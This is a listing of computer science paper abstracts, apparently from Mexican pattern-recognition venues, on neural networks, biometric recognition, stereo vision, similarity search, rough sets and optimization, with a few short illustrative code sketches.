In this note we present our most recent advances in the automatic design of artificial neural networks (ANNs) and associative memories (AMs) for pattern classification and pattern recall. Particle Swarm Optimization (PSO), Differential Evolution (DE), and Artificial Bee Colony (ABC) algorithms are used for ANNs; Genetic Programming is adopted for AMs. The derived ANNs and AMs are tested with several examples of well-known databases. As we will show, results are very promising.
By
Villalobos Castaldi, Fabiola M.; Felipe-Riveron, Edgardo M.; Gómez, Ernesto Suaste
The retinal vascular network has many desirable characteristics as a basis for authentication, including uniqueness, stability, and permanence. In this paper, a new approach for retinal image feature extraction and template coding is proposed. The use of a logarithmic spiral sampling grid for scanning and tracking the vascular network is the key to making this new approach simple, flexible and reliable. Experiments show that this approach can reduce both the dimensionality of the data and the time required to obtain the biometric code of the vascular network in a retinal image. The experiments performed demonstrated that the proposed verification system has an average accuracy of 95.0–98%.
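A logarithmic spiral sampling grid can be generated directly from the polar equation r = a·e^(b·θ). The parameters, number of samples, and centring (presumably on a reference point such as the optic disc) are application-specific assumptions in this sketch:

```python
import math

def log_spiral_points(a, b, n, turns=3):
    """n sampling points along the logarithmic spiral r = a*exp(b*theta),
    covering the given number of turns, as (x, y) offsets from the
    spiral centre."""
    pts = []
    for i in range(n):
        theta = turns * 2 * math.pi * i / n
        r = a * math.exp(b * theta)
        pts.append((r * math.cos(theta), r * math.sin(theta)))
    return pts

grid = log_spiral_points(1.0, 0.1, 100)  # radius grows monotonically
```

Sampling along such a spiral yields a 1-D sequence of image values, which is one way a 2-D vascular pattern can be reduced to a compact template.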
By
Suaste, Verónica; Caudillo, Diego; Shin, Bok-Suk; Klette, Reinhard
Third-eye stereo analysis evaluation compares a virtual image, derived from results obtained by binocular stereo analysis, with a recorded image at the same pose. This technique is applied for evaluating stereo matchers on long (or continuous) stereo input sequences where no ground truth is available. The paper provides a critical and constructive discussion of this method, introduces data measures on input video sequences as an additional tool for analyzing issues of stereo matchers in particular scenarios, and reports on extensive experiments using two top-rated stereo matchers.
By
Jiménez-Guarneros, Magdiel; Carrasco-Ochoa, Jesús Ariel; Martínez-Trinidad, José Fco.
Currently, graph embedding has attracted great interest in the area of structural pattern recognition, especially techniques based on representation via dissimilarity. However, one of the main problems of this technique is the selection of a suitable set of prototype graphs that better describes the whole set of graphs. In this paper, we evaluate the use of an instance selection method based on clustering for graph embedding, which selects border prototypes and some non-border prototypes. An experimental evaluation shows that the selected method achieves competitive accuracy and better runtimes than other state-of-the-art methods.
By
Serrano, Juan Pablo; Hernández, Arturo; Herrera, Rafael
1 Citation
We apply the Hyper-Conic Artificial Multilayer Perceptron (HC-MLP) to color image segmentation, where we treat image segmentation as a classification problem distinguishing between foreground and background pixels. The HC-MLP was designed using the conic space and conformal geometric algebra. The neurons in the hidden layer contain a transfer function that defines a quadratic surface (spheres, ellipsoids, paraboloids and hyperboloids) by means of inner and outer products, and the neurons in the output layer contain a transfer function that decides whether a point is inside or outside a sphere. The Particle Swarm Optimization (PSO) algorithm is used to train the HC-MLP. A benchmark of fifty images is used to evaluate the performance of the algorithm and to compare our proposal against statistical methods that use Gaussian copula functions.
By
Palacios, José Juan
We describe our work in progress on μACL, a light implementation of the language ACL (Asynchronous Communications in Linear Logic) for concurrent and distributed linear logic programming. Our description of computing elements (Agents) is inspired by the Actor model of concurrent computation. The essential requirements for Agent programming (communication, concurrency, actions, state update, modularity and code migration) are naturally expressed in μACL. We also describe some considerations towards the implementation of a distributed virtual machine for efficient execution of μACL programs.
By
Alba, Alfonso; Arce-Santana, Edgar
1 Citation
In this paper, we propose a new theoretical framework, based on phase correlation, for efficiently solving the correspondence problem. The proposed method allows area matching algorithms to perform at high frame rates, and can be applied to various problems in computer vision. In particular, we demonstrate the advantages of this method in the estimation of dense disparity maps in real time. A fairly optimized version of the proposed algorithm, implemented on a dual-core PC architecture, is capable of running at 100 frames per second with an image size of 256 × 256.
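The abstract does not include the underlying computation, but the core of any phase-correlation matcher can be sketched as follows (a minimal NumPy illustration, not the authors' implementation; the function name is ours):

```python
import numpy as np

def phase_correlation(a, b):
    """Estimate the integer translation between two equal-size images
    using the normalized cross-power spectrum (phase correlation)."""
    A = np.fft.fft2(a)
    B = np.fft.fft2(b)
    R = A * np.conj(B)
    R /= np.maximum(np.abs(R), 1e-12)      # keep only the phase information
    corr = np.real(np.fft.ifft2(R))        # sharp peak at the shift position
    dy, dx = np.unravel_index(np.argmax(corr), corr.shape)
    # wrap shifts larger than half the image size to negative values
    h, w = a.shape
    if dy > h // 2:
        dy -= h
    if dx > w // 2:
        dx -= w
    return int(dy), int(dx)

# shift a random image by (3, 5) with wrap-around and recover the shift
rng = np.random.default_rng(0)
img = rng.random((64, 64))
shifted = np.roll(img, shift=(3, 5), axis=(0, 1))
print(phase_correlation(shifted, img))  # -> (3, 5)
```

Because only the phase of the cross-power spectrum is kept, the correlation surface has a single sharp peak, which is what makes the approach fast enough for the real-time disparity estimation described above.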
By
Sanvicente-Sánchez, Héctor; Frausto-Solís, Juan
2 Citations
The Methodology to Parallelize Simulated Annealing (MPSA) leads to massive parallelization by executing each temperature cycle of the Simulated Annealing (SA) algorithm in parallel. The initial solution for each internal cycle is set through Monte Carlo random sampling so as to fit the Boltzmann distribution at the beginning of the cycle. MPSA uses an asynchronous communication scheme, and any implementation of MPSA yields a parallel Simulated Annealing algorithm that is in general faster than its sequential version while precision is preserved. This paper illustrates the advantages of the MPSA scheme by parallelizing an SA algorithm for the Traveling Salesman Problem.
By
Favela, Jesús; Alba, Manuel; Rodríguez, Marcela
The proliferation of different computing devices such as handhelds and wall-size whiteboards, as well as Internet-based distributed information systems, are creating ubiquitous computing environments that provide constant access to information regardless of the user’s location. Handheld computers are being transformed from personal electronic agendas into mobile communication devices with intermittent network connectivity. Thus, these devices are becoming a natural medium to tap into a ubiquitous computing infrastructure. Not only do they store much of the user’s personal information (contacts list, meeting schedule, to-do list, etc.), but they are always at hand, in sharp contrast with desktop computers. Handhelds, however, most often operate disconnected from the network, thus reducing the opportunities for computer-mediated collaboration with other peers or computational resources. In this paper we present an extension to the COMAL handheld collaborative development framework to support autonomous agents that can act on behalf of the user. We discuss scenarios that take advantage of such a platform and the design decisions that were made to implement it. The use of the framework is illustrated with the development of an agent that recommends talks within a conference, based on the context and the user’s profile.
By
Lazo-Cortés, Manuel S.; Martínez-Trinidad, José Francisco; Carrasco-Ochoa, Jesús Ariel
1 Citation
In this article, we revisit the concept of Goldman’s fuzzy testor and restudy it from the perspective of the conceptual approach to attribute reducts introduced by Y. Y. Yao in the framework of Rough Set Theory. We reformulate the original concept of Goldman’s fuzzy testor and introduce Goldman’s fuzzy reducts. Additionally, in order to show the usefulness of Goldman’s fuzzy reducts, we build a rule-based classifier and evaluate its performance in a case study.
By
Ortiz-Bayliss, José Carlos; Terashima-Marín, Hugo; Conant-Pablos, Santiago Enrique
Hyper-heuristics are methodologies that choose from a set of heuristics and decide which one to apply given some properties of the current instance. When solving a constraint satisfaction problem, the order in which the variables are selected to be instantiated has implications for the complexity of the search. In this paper we propose a logistic regression model to generate hyper-heuristics for variable ordering within constraint satisfaction problems. The first step in our approach is to generate a training set that maps any given instance, expressed in terms of some of its features, to one suitable variable ordering heuristic. This set is later used to train the system and generate a hyper-heuristic that decides which heuristic to apply given the features of the instance at hand at different steps of the search. The results suggest that hyper-heuristics generated through this methodology allow us to exploit the strengths of the heuristics to minimize the cost of the search.
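As an illustration of the idea (not the authors' system), a logistic-regression selector that maps instance features to one of two variable ordering heuristics might look like the sketch below; the single feature, the labels and the heuristic names are all hypothetical:

```python
import numpy as np

def train_selector(X, y, lr=0.5, epochs=500):
    """Logistic-regression hyper-heuristic: learn P(heuristic = 1 | features).
    X: instance features (e.g. constraint density); y: 0/1 label of the
    variable ordering heuristic that solved the instance fastest."""
    X = np.hstack([np.ones((len(X), 1)), np.asarray(X, float)])  # bias term
    w = np.zeros(X.shape[1])
    for _ in range(epochs):
        p = 1.0 / (1.0 + np.exp(-X @ w))
        w += lr * X.T @ (y - p) / len(X)     # gradient ascent on likelihood
    return w

def choose_heuristic(w, features):
    x = np.concatenate([[1.0], features])
    return int(x @ w > 0)   # 0 -> e.g. min-domain, 1 -> e.g. max-degree

# toy training data: dense instances (feature > 0.5) labeled for heuristic 1
X = np.array([[0.1], [0.2], [0.3], [0.7], [0.8], [0.9]])
y = np.array([0, 0, 0, 1, 1, 1])
w = train_selector(X, y)
print(choose_heuristic(w, np.array([0.15])), choose_heuristic(w, np.array([0.85])))
```

At search time the current instance's features are evaluated and the predicted heuristic is applied, which is the decision step the abstract describes.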
By
Monroy, Raúl
In the formal methods approach to software verification, we use logical formulae to model both the program and its intended specification, and then apply (automated) reasoning techniques to demonstrate that the formulae satisfy a verification conjecture. One may either apply proving techniques, to provide a formal verification argument, or disproving techniques, to falsify the verification conjecture. However, programs often contain bugs or are flawed, and so the verification process breaks down. Interpreting the failed proof attempt or the counterexample, if any, is very valuable, since it potentially helps identify the program bug or flaw. Lakatos, in his book Proofs and Refutations, argues that the analysis of a failed proof often holds the key to the development of a theory. Proof analysis enables the strengthening of naïve conjectures and concepts without severely weakening their content. In this paper, we survey our experiences with the productive use of failure in the context of a few theories, natural numbers and (higher-order) lists, and in the context of security protocols.
By
Olague, Gustavo; Puente, Cesar
9 Citations
This paper investigates the communication system of honeybees with the purpose of obtaining an intelligent approach to three-dimensional reconstruction. A new framework is proposed in which the 3D points communicate among themselves to achieve an improved sparse reconstruction that could be used reliably in further visual computing tasks. The general ideas that explain honeybee behavior are translated into a computational algorithm following the evolutionary computing paradigm. Experiments demonstrate the importance of the proposed communication system in dramatically reducing the number of outliers.
By
González-Gómez, Efrén; Levachkine, Serguei
We consider the hard problem of cartographic pattern recognition in fine-scale maps using information that comes from coarse-scale maps. The maps are raster-scanned color maps of different themes, representing the same territory at coarse and fine scale respectively. A solution called the Coarse-to-Fine Scale Method is proposed. This method is defined in terms of means: coarse-scale maps and their information; concepts: image associated function, cartographic knowledge domain and cartographic pattern; and tools: a set of clustering criteria from Logical Combinatorial Pattern Recognition.
By
Gaxiola, Fernando; Melin, Patricia; Valdez, Fevrier; Castillo, Oscar
1 Citation
This paper presents a new modular neural network architecture used to build a system for pattern recognition based on the iris biometric measurement of persons. In this system, the images in the person iris database are enhanced with image processing methods, and the coordinates of the center and radius of the iris are obtained to cut out the area of interest by removing the noise around the iris. The inputs to the modular neural network are the processed iris images and the output is the number of the identified person. The integration of the modules was done with a type-2 fuzzy integrator at the level of the submodules, and with a gating network at the level of the modules.
By
Sánchez, Daniela; Melin, Patricia; Castillo, Oscar
In this paper we propose a new model of a Modular Neural Network (MNN) with fuzzy integration based on granular computing. The topology and parameters of the model are optimized with a Hierarchical Genetic Algorithm (HGA). The model was applied to the case of human recognition to illustrate its applicability. The proposed method is able to divide the data automatically into submodules, to work with a percentage of the images, and to select which images will be used for training. To test this method, we considered the problem of human recognition based on the ear, using a database of 77 persons (with 4 images per person).
By
García-Vázquez, Mireya S.; Garea-Llano, Eduardo; Colores-Vargas, Juan M.; Zamudio-Fuentes, Luis M.; Ramírez-Acosta, Alejandro A.
Iris recognition is widely used in different environments where the identity of a person is necessary. It is therefore a challenging problem to maintain high reliability and stability of this kind of system in harsh environments. Iris segmentation is one of the most important processes in iris recognition for preserving the above-mentioned characteristics; indeed, iris segmentation may compromise the performance of the entire system. This paper presents a comparative study of four segmentation algorithms in the frame of a high-reliability iris verification system. These segmentation approaches are implemented, evaluated and compared based on their accuracy using three unconstrained databases, one of them a video iris database. The results show that, for an ultra-high security system on verification at FAR = 0.01 %, segmentation 3 (Viterbi) presents the best results.
By
Figueroa, Karina; Paredes, Rodrigo
2 Citations
Proximity searching consists in retrieving objects from a database similar to a given query. Nowadays, as multimedia databases keep growing, this is an elementary task. The permutation-based index (PBI) and its variants are excellent techniques for solving proximity searching in high-dimensional spaces; however, they have been beatable in low-dimensional ones. Another drawback of the PBI is that the distance between permutations does not allow elements to be discarded safely when solving similarity queries.
In the following, we introduce an improvement on the PBI that produces a better promissory order using less space than the basic permutation technique and also gives us information to discard some elements. To do so, besides the permutations, we quantize distance information by defining distance rings around each permutant, and we also keep this data. The experimental evaluation shows we can dramatically improve upon specialized techniques in low-dimensional spaces. For instance, on the real-world dataset of NASA images, our boosted PBI uses up to 90 % fewer distance evaluations than AESA, the state-of-the-art searching algorithm with the best performance in this particular space.
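The basic PBI machinery the abstract builds on can be sketched in a few lines (a toy one-dimensional illustration under our own naming, without the distance-ring quantization the paper adds):

```python
import numpy as np

def permutation(obj, permutants, dist):
    """An object's 'view': permutant indices ordered by closeness to obj."""
    return np.argsort([dist(obj, p) for p in permutants])

def footrule(pi, sigma):
    """Spearman footrule between two permutations of the permutant set."""
    return int(np.abs(np.argsort(pi) - np.argsort(sigma)).sum())

def pbi_order(query, db, permutants, dist):
    """Rank database objects by how similar their permutation is to the
    query's; true near neighbors tend to appear early in this order."""
    q = permutation(query, permutants, dist)
    return sorted(range(len(db)),
                  key=lambda i: footrule(q, permutation(db[i], permutants, dist)))

euclid = lambda a, b: float(abs(a - b))
db = [float(i) for i in range(10)]       # ten points on a line
permutants = [0.0, 4.0, 9.0]             # three of them act as permutants
order = pbi_order(2.1, db, permutants, euclid)
print(order[:3])  # -> [3, 4, 0]
```

Note the order is only promissory: the query 2.1 is closest to point 2, yet points 3 and 4 share the query's exact permutation, which is precisely why permutation distances cannot discard elements safely, as the abstract points out.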
By
Lazo-Cortés, Manuel S.; Martínez-Trinidad, José Fco.; Carrasco-Ochoa, J. A.
This paper studies the relationship between the two most common definitions of reduct. Although there are other definitions, almost all the literature published in the framework of the Theory of Rough Sets uses one of the two definitions we study here. However, there is ambiguity in the use of these definitions, and authors often do not declare beforehand which definition they refer to. Moreover, there are no publications where the relation between these two definitions is discussed at length, which is precisely what this paper addresses. We state and prove several properties expressing relations between both definitions, including some illustrative examples.
By
Tovar, Mireya; Pinto, David; Montes, Azucena; Serna, Gabriel; Vilariño, Darnes
1 Citation
In this paper we present an approach for the automatic identification of relations in ontologies of restricted domain. We use the evidence found in a corpus associated with the same domain as the ontology to determine the validity of the ontological relations. Our approach employs formal concept analysis, a method used for the analysis of data, in this case applied to relation discovery in a corpus of restricted domain. The approach uses two variants for filling the incidence matrix that this method employs. The formal concepts are used for evaluating the ontological relations of two ontologies. The performance obtained was about 96 % for taxonomic relations and 100 % for non-taxonomic relations in the first ontology; in the second it was about 92 % for taxonomic relations and 98 % for non-taxonomic relations.
By
Figueroa, Karina; Paredes, Rodrigo
1 Citation
The permutation-based index has been shown to be very effective in medium- and high-dimensional metric spaces, even in difficult problems such as solving reverse k-nearest neighbor queries. Nevertheless, there is currently no study of which features are desirable in a permutant set, or of how to select good permutants. As in the case of pivots, our experimental results show that, compared with a randomly chosen set, a good permutant set yields fast query response or reduces the amount of space used by the index. In this paper, we start by characterizing permutants and studying their predictive power; then we propose an effective heuristic to select a good set of permutant candidates. We also show empirical evidence that supports our technique.
By
Ita Luna, Guillermo; Marcial-Romero, J. Raymundo
1 Citation
We present some results about the parametric complexity of #2SAT and #2UNSAT, which consist in counting the number of models and falsifying assignments, respectively, of two-Conjunctive Forms (2-CFs). Firstly, we show some cases where, given a formula F, #2SAT(F) can be bounded above by considering a binary pattern analysis over its set of clauses. Secondly, since #2SAT(F) = 2^{n} − #2UNSAT(F), we show that, by considering the constrained graph G_{F} of F, if G_{F} is an acyclic graph then #2UNSAT(F) can be computed in polynomial time. To the best of our knowledge, this is the first time that #2UNSAT has been computed through the constrained graph, since the inclusion-exclusion formula has commonly been used for computing #2UNSAT(F).
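The identity #2SAT(F) = 2^n − #2UNSAT(F) used above is easy to check exhaustively on small formulas (a brute-force sketch for illustration only; the paper's contribution is the polynomial-time acyclic case, not this enumeration):

```python
from itertools import product

def count_models(clauses, n):
    """Brute-force #2SAT: count assignments satisfying every 2-clause.
    A literal is +i (variable i true) or -i (variable i false), i in 1..n."""
    sat = lambda lit, a: a[abs(lit) - 1] == (lit > 0)
    return sum(all(sat(l1, a) or sat(l2, a) for l1, l2 in clauses)
               for a in product([False, True], repeat=n))

# F = (x1 or x2) and (not x1 or x3): 8 assignments over 3 variables
F = [(1, 2), (-1, 3)]
models = count_models(F, 3)
falsifying = 2 ** 3 - models       # #2UNSAT(F) = 2^n - #2SAT(F)
print(models, falsifying)  # -> 4 4
```

The enumeration is exponential in n, which is exactly why structural results such as the acyclic constrained-graph case matter.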
By
Rodríguez, Lisbeth; Li, Xiaoou; Mejía-Alvarez, Pedro
2 Citations
Vertical partitioning is a well-known technique for improving query response time in relational databases. It consists in dividing a table into a set of fragments of attributes according to the queries run against the table. In dynamic systems the queries tend to change with time, so a dynamic vertical partitioning technique is needed that adapts the fragments to the changes in query patterns in order to avoid long query response times. In this paper, we propose an active system for dynamic vertical partitioning of relational databases, called DYVEP (DYnamic VErtical Partitioning). DYVEP uses active rules to vertically fragment and refragment a database without the intervention of a database administrator (DBA), maintaining an acceptable query response time even when the query patterns in the database change. Experiments with the TPC-H benchmark demonstrate efficient query response time.
By
Batyrshin, Ildar; Sheremetov, Leonid
3 Citations
Methods for pattern recognition in time series based on the moving approximation (MAP) transform and MAP images of patterns are proposed. We discuss the main properties of the MAP transform, introduce the concept of a MAP image of a time series, and define a distance between time series patterns based on this concept, which is used for the recognition of small patterns in noisy time series. To illustrate the application of this technique to the recognition of perception-based patterns given by a sequence of slopes, we consider an example of recognizing water production patterns in petroleum wells, used in an expert system for the diagnosis of water production problems.
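As we understand it, the MAP transform replaces a time series by the slopes of least-squares lines fitted over a sliding window; a minimal sketch of that windowed-slope computation (our reconstruction for illustration, not the authors' code):

```python
def map_transform(y, k):
    """Moving approximation (MAP) transform: the sequence of slopes of
    least-squares lines fitted to each window of k consecutive values."""
    xs = list(range(k))
    x_mean = sum(xs) / k
    denom = sum((x - x_mean) ** 2 for x in xs)
    slopes = []
    for i in range(len(y) - k + 1):
        w = y[i:i + k]
        y_mean = sum(w) / k
        num = sum((x - x_mean) * (v - y_mean) for x, v in zip(xs, w))
        slopes.append(num / denom)   # ordinary least-squares slope
    return slopes

# a strictly linear series has the same slope in every window
print(map_transform([1, 3, 5, 7, 9], 3))  # -> [2.0, 2.0, 2.0]
```

Comparing two series by the slope sequences rather than the raw values is what makes the pattern matching robust to level shifts and noise.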
By
Olvera-López, J. Arturo; Martínez-Trinidad, J. Francisco; Carrasco-Ochoa, J. Ariel
1 Citation
In supervised classification, object selection (instance selection) is an important task, mainly for instance-based classifiers, since through this process the time spent in the training and classification stages can be reduced. In this work, we propose a new mixed-data object selection method based on clustering and border objects. We carried out an experimental comparison between our method and other object selection methods using several mixed-data classifiers.
By
Escalante, Hugo Jair; Acosta-Mendoza, Niusvel; Morales-Reyes, Alicia; Gago-Alonso, Andrés
The ensemble classification paradigm is an effective way to improve the performance and stability of individual predictors. Many ways to build ensembles have been proposed so far, most notably bagging- and boosting-based techniques. Evolutionary algorithms (EAs) have also been widely used to generate ensembles. In the context of heterogeneous ensembles, EAs have been successfully used to adjust weights of base classifiers or to select ensemble members. Usually, a weighted sum is used for combining classifier outputs in both classical and evolutionary approaches. This study proposes a novel genetic program that learns a fusion function for combining heterogeneous-classifier outputs. It evolves a population of fusion functions in order to maximize the classification accuracy. Highly nonlinear functions are obtained with the proposed method, subsuming the existing weighted-sum formulations. Experimental results show the effectiveness of the proposed approach, which can be used not only with heterogeneous classifiers but also with homogeneous classifiers and under bagging/boosting-based formulations.
By
Sánchez-Ante, Gildardo
Applications such as programming spot-welding stations require computing paths in high-dimensional spaces. Random sampling approaches, such as Probabilistic Roadmaps (PRM), have shown great potential for solving path-planning problems in these kinds of environments. In this paper, we review the description of a new probabilistic roadmap planner, called SBL, which stands for Single-query, Bidirectional and Lazy collision checking, and we add some new results that allow a better comparison of SBL against other similar planners. The combination of features offered by SBL reduces the planning time by large factors, making it possible to handle more difficult planning problems, including multi-robot problems in geometrically complex environments. Specifically, we show the results obtained using SBL in environments with as many as 36 degrees of freedom, and in environments in which narrow passages are present.
By
García-Perera, L. Paola; Mex-Perera, Carlos; Nolazco-Flores, Juan A.
In this research we present a new scheme for the generation of a biometric key based on automatic speech technology and Support Vector Machines. Keys are produced by distinguishing among the voice attributes of the users by means of hyperplanes. We describe how the key is formed and the reliability of the method, and present an experimental evaluation for different values of the parameters. Among the different kernels for the Support Vector Machine, the RBF kernel obtained the best results.
By
Tecuanhuehue-Vera, P.; Carrasco-Ochoa, Jesús Ariel; Martínez-Trinidad, José Fco.
Multidimensional scaling maps a set of n-dimensional objects into a lower-dimensional space, usually the Euclidean plane, preserving the distances among objects in the original space. Most algorithms for multidimensional scaling have been designed to work on numerical data, but in the soft sciences it is common for objects to be described using quantitative and qualitative attributes, even with some missing values. For this reason, in this paper we propose a genetic algorithm especially designed for multidimensional scaling over mixed and incomplete data. Experiments using datasets from the UCI repository, and a comparison against a common algorithm for multidimensional scaling, show the behavior of our proposal.
By
Loyola-González, Octavio; Martínez-Trinidad, José Fco.; Carrasco-Ochoa, Jesús Ariel; García-Borroto, Milton
Applying resampling methods is an important approach for dealing with class imbalance problems. The main reason is that many classifiers are sensitive to class distribution, biasing their prediction towards the majority class. Contrast pattern based classifiers are sensitive to imbalanced databases because these classifiers commonly find several patterns of the majority class and only a few patterns (or none) of the minority class. In this paper, we present a correlation study among resampling methods for contrast pattern based classifiers. Our experiments, performed over several imbalanced databases, show that there is a high correlation among different resampling methods. The correlation results show that there are nine different groups with very high inner correlation and very low outer correlation. We show that most resampling methods allow improving the accuracy of contrast pattern based classifiers.
By
Antonio Ruz Hernández, José; Suárez Cerda, Dionisio A.; Shelomov, Evgen; Villavicencio Ramírez, Alejandro
This paper presents an application of artificial intelligence techniques to the improvement of the operation of a thermoelectric unit. The capacity for empirical learning gained from artificial intelligence systems was utilized in the development of the strategy. A neuro-fuzzy model of the steam generator startup process is obtained from experimental data. Ultimately, the neuro-fuzzy model is combined with a predictive control algorithm to produce a control strategy for the heating stage of the steam generator. This provides the operators at the fossil power plant with the necessary information to efficiently accomplish the heating process. The information gained from the control strategy is not directly applied to an automatic control scheme; it is presented to the operator, who then decides on its application. In this way, the information is used to develop a strategy that takes into consideration the personal capacity and the working routine of the operator. The simulation tests that were carried out demonstrated the feasibility and the beneficial results that can be obtained from the application of any of the three variants of predictive control proposed in this paper.
By
Morales-Hernández, Luis A.; Herrera-Navarro, Ana M.; Manriquez-Guerrero, Federico; Peregrina-Barreto, Hayde; Terol-Villalobos, Iván R.
1 Citation
The microstructure of graphite nodules plays a fundamental role in the mechanical properties of cast iron. Traditional measures used to study spheroidal graphite are nodule density, nodularity, volume fraction and mean size. However, these parameters sometimes do not permit a good characterization of the microstructure since they do not allow the discrimination of different regions. In fact, other measures, such as size and spatial distributions, enable a better understanding of the mechanical properties that can be obtained either by altering certain processing variables or through various heat treatments. In the present paper, a method to characterize graphite nodule microstructure based on the connectivity generated by dilations is introduced. This approach, which takes into account the size and spatial distributions of graphite, makes it possible to relate the microstructure of graphite nodules to wear behavior.
By
Tovar, Mireya; Pinto, David; Montes, Azucena; Vilariño, Darnes
Measuring the degree of semantic similarity for word pairs is a very challenging task that has been addressed by the computational linguistics community in recent years. In this paper, we propose a method for evaluating input word pairs in order to measure their degree of semantic similarity. This unsupervised method uses a prototype vector calculated on the basis of word pair representative vectors, which are constructed using snippets automatically gathered from the world wide web.
The obtained results show that the approach based on prototype vectors outperforms the results reported in the literature for a particular semantic similarity class.
By
Levachkine, Serguei; Velàzquez, Aurelio; Alexandrov, Victor; Kharinov, Mikhail
11 Citations
Semantic analysis of cartographic images is interpreted as a separate representation of cartographic patterns (alphanumeric, punctual, linear, and area). We present an approach to map interpretation exploring the idea of synthesizing invariant graphic images at low-level processing (vectorization and segmentation). This means that we run “vectorization-recognition” and “segmentation-interpretation” systems simultaneously. Although these systems can generate some interpretation errors, they are much more useful for the subsequent understanding algorithms because their output consists of nearly recognized objects of interest.
By
Esquivel, Susana C.; Coello, Carlos A. Coello
7 Citations
In this paper, we study the use of particle swarm optimization (PSO) for a class of non-stationary environments. The dynamic problems studied in this work are restricted to one of the possible types of changes that can be produced over the fitness landscape. We propose a hybrid PSO approach (called HPSO_dyn), which uses a dynamic macro-mutation operator whose aim is to maintain diversity. In order to validate our proposed approach, we adopted the test case generator proposed by Morrison & De Jong [1], which allows the creation of different types of dynamic environments with varying degrees of complexity. The main goal of this research was to determine the advantages and disadvantages of using PSO in non-stationary environments. As part of our study, we were interested in analyzing the ability of PSO to track an optimum that changes its location over time, as well as the behavior of the algorithm in the presence of high dimensionality and multimodality.
By
Escobar-Acevedo, Adelina; Montes-y-Gómez, Manuel; Villaseñor-Pineda, Luis
Cross-language text classification (CLTC) aims to take advantage of existing training data in one language to construct a classifier for another language. In addition to the expected translation issues, CLTC is also complicated by the cultural distance between both languages, which causes documents belonging to the same category to concern very different topics. This paper proposes a re-classification method whose purpose is to reduce the errors caused by this phenomenon by considering information from the target language documents themselves. Experimental results on a news corpus considering three pairs of languages and four categories demonstrated the appropriateness of the proposed method, which could improve the initial classification accuracy by up to 11 %.
By
Rivera-Rovelo, Jorge; Herold, Silena; Bayro-Corrochano, Eduardo
2 Citations
In this paper we present a method based on self-organizing neural networks to extract the shape of a 2D or 3D object using a set of transformations expressed as versors in the conformal geometric algebra framework. Such transformations, when applied to any geometric entity of this geometric algebra, define the shape of the object. This approach was tested with several images; here we first show its utility using a 2D magnetic resonance image to segment the ventricle, and then present some examples of an application for the case of 3D objects.
By
Bayro-Corrochano, Eduardo
In this paper the authors use the framework of geometric algebra for applications in computer vision, robotics and learning. This mathematical system preserves our intuitions and insight into the geometry of the problem at hand and helps us to reduce considerably the computational burden of the problems. The authors show that the framework of geometric algebra can in general be of great advantage for applications using stereo vision, range data, laser, omnidirectional and odometry-based systems. For learning, the paper presents the Clifford Support Vector Machines as a generalization of the real- and complex-valued Support Vector Machines.
By
Medina-Pérez, Miguel Angel; García-Borroto, Milton; Gutierrez-Rodríguez, Andres Eduardo; Altamirano-Robles, Leopoldo
1 Citation
Developing accurate fingerprint verification algorithms is an active research area. A large number of fingerprint verification algorithms are based on minutiae descriptors, and an important component of these algorithms is the alignment strategy. The single alignment strategy, with O(n^{2}) time complexity, uses the local matching minutiae pair that maximizes the similarity value to align the minutiae. Nevertheless, even if the selected minutiae pair is a true matching pair, it is not necessarily the best pair for carrying out fingerprint alignment. The multiple alignment strategy alleviates this limitation by performing multiple minutiae alignments, increasing the time complexity to O(n^{4}). In this paper, we improve the multiple alignment strategy, reducing its complexity while still achieving high accuracy. The new strategy is based on the rationale that most minutiae descriptors from one fingerprint correspond with their most similar descriptors from the other fingerprint. To test the behavior of the new strategy, we adapt three well-known algorithms to a traditional multiple alignment strategy and to our strategy. Several experiments on the FVC2004 database show that our strategy outperforms both the single and the multiple alignment strategies.
By
Arriaga, Jonathan; Valenzuela-Rendón, Manuel
1 Citations
The construction of a portfolio in the financial field is a problem faced by individuals and institutions worldwide. In this paper we present an approach to solve the portfolio selection problem with the Steepest Ascent Hill Climbing algorithm. Many works reported in the literature attempt to solve this problem using evolutionary methods. We analyze the quality of the solutions found by this simpler algorithm and show that its performance is similar to that of a Genetic Algorithm, a more complex method. Real-world restrictions such as portfolio value and round lots are considered to give a realistic approach to the problem.
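Steepest Ascent Hill Climbing evaluates every neighbor of the current solution and moves to the best improving one, stopping at a local optimum. A minimal sketch under simplifying assumptions: the objective (maximize expected return) and the neighborhood (shift a fixed step of weight between two assets) are hypothetical stand-ins, not the paper's formulation, which also handles value and lot restrictions.

```python
def steepest_ascent(weights, expected_ret, step=0.05):
    """Steepest Ascent Hill Climbing on portfolio weights (sketch).
    A neighbor moves `step` weight from one asset to another, keeping
    the weights summing to 1."""
    def objective(w):
        return sum(wi * ri for wi, ri in zip(w, expected_ret))
    current = list(weights)
    while True:
        best, best_val = None, objective(current)
        n = len(current)
        for i in range(n):            # move `step` from asset i to asset j
            for j in range(n):
                if i == j or current[i] < step:
                    continue
                cand = list(current)
                cand[i] -= step
                cand[j] += step
                val = objective(cand)
                if val > best_val:    # steepest ascent: keep the best neighbor
                    best, best_val = cand, val
        if best is None:              # no improving neighbor: local optimum
            return current
        current = best
```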
By
Lemuz-López, Rafael; Arias-Estrada, Miguel
1 Citations
In this paper we address the problem of recovering the three-dimensional shape of an object and the motion of the camera from multiple feature correspondences in an image sequence. We present a new incremental projective factorization algorithm using a perspective camera model. The original projective factorization method produces robust results. However, it cannot be applied to real-time applications, since it is based on a batch processing pipeline and the size of the data matrix grows with each additional frame. The proposed algorithm obtains an estimate of shape and motion for each additional frame by adding a dimension reduction step. A subset of frames is selected by analyzing the contribution of each frame to the reconstruction quality. The main advantage of the novel algorithm is the reduction of the computational cost while keeping the robustness of the original method. Experiments with synthetic and real images illustrate the accuracy and performance of the new algorithm.
By
Sánchez-Parra, Marino; Vite-Hernández, René
A rule-based, digital, closed-loop controller that incorporates “fuzzy” logic has been designed and implemented for the control of flow instabilities in axial compressors used with gas turbines for power generation. Having designed several controllers for similar purposes [1], a comparison was made between the rule-based and analytic approaches. Differences in the division of labor between plant engineers and control specialists, the type of knowledge required and its acquisition, the use of performance criteria, and controller testing are discussed. The design, implementation, and calibration of rule-based controllers are reviewed, with specific examples taken from the completed work on the generic dynamic mathematical model (GDMM) of flow instabilities in axial compressors developed in the IIE Department of Control and Instrumentation [2].
By
Domínguez, A. Rojas; Lara-Alvarez, Carlos; Bayro, Eduardo
2 Citations
A novel method for automated identification of banknote denominations based on image processing is presented. The method is part of a wearable aiding system for the visually impaired, and it uses a standard video camera as the image collecting device. The method first extracts points of interest from the denomination region of a banknote and then performs an analysis of the geometrical patterns so defined, which allows the identification of the banknote denomination. Experiments were performed with a test subject in order to simulate real-world operating conditions. A high average identification rate was achieved.
By
